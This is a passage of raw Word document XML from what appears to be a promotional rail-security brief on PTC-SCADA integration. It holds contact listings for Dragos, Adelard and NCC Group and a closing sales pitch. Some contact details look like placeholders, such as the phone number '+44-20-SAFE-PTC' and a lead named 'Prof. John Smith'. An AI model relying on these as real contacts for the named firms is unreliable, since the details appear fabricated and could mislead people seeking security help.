            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://portal.dragos.com/rail</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lead: Mark Bristow, Rail Sector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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard Safety Systems</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Email: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ptc-safety@adelard.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phone: +44-20-SAFE-PTC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://adelard.com/rail-safety</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lead: Prof. John Smith, Safety Critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lbrtxyxhdb1" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Choice Is Clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure your PTC-SCADA integration with the only solution that maintains safety while defeating advanced threats. Or accept unlimited liability when safety systems become attack vectors.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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protect your trains. Protect your passengers. Protect your future.</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i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Express Attack Brief 016 - Enhanced Edition</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i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ptc-safety@adelard.com" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.dragos.com/rail" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adelard.com/rail-safety" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:rail@dragos.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:ptc-emergency@nccgroup.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:ptc-emergency@nccgroup.com" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nccgroup.com/ptc-def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